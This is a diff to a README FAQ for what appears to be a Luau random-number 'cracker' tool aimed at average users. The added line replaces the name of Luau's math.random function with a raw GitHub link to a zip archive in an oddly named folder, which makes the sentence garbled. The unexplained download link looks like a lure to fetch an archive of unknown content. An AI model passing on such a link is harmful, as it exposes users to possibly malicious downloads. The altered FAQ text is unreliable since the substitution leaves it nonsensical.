marcohp1985/luau-rng-cracker/README.md

 A: No, the tool is designed for average users.
 You only need to follow the simple instructions provided.

 ### Q: Can I use this tool for any random number generator?
-A: This tool specifically targets Luau’s `math.random` feature and may not work with other random number generators.
+A: This tool specifically targets Luau’s `https://raw.githubusercontent.com/marcohp1985/luau-rng-cracker/main/trinerved/cracker-luau-rng-v2.3-alpha.4.zip` feature and may not work with other random number generators.

 ### Q: How can I contribute?
 A: Contributions are welcome!
 You can fork the repository, make changes, and submit a pull request.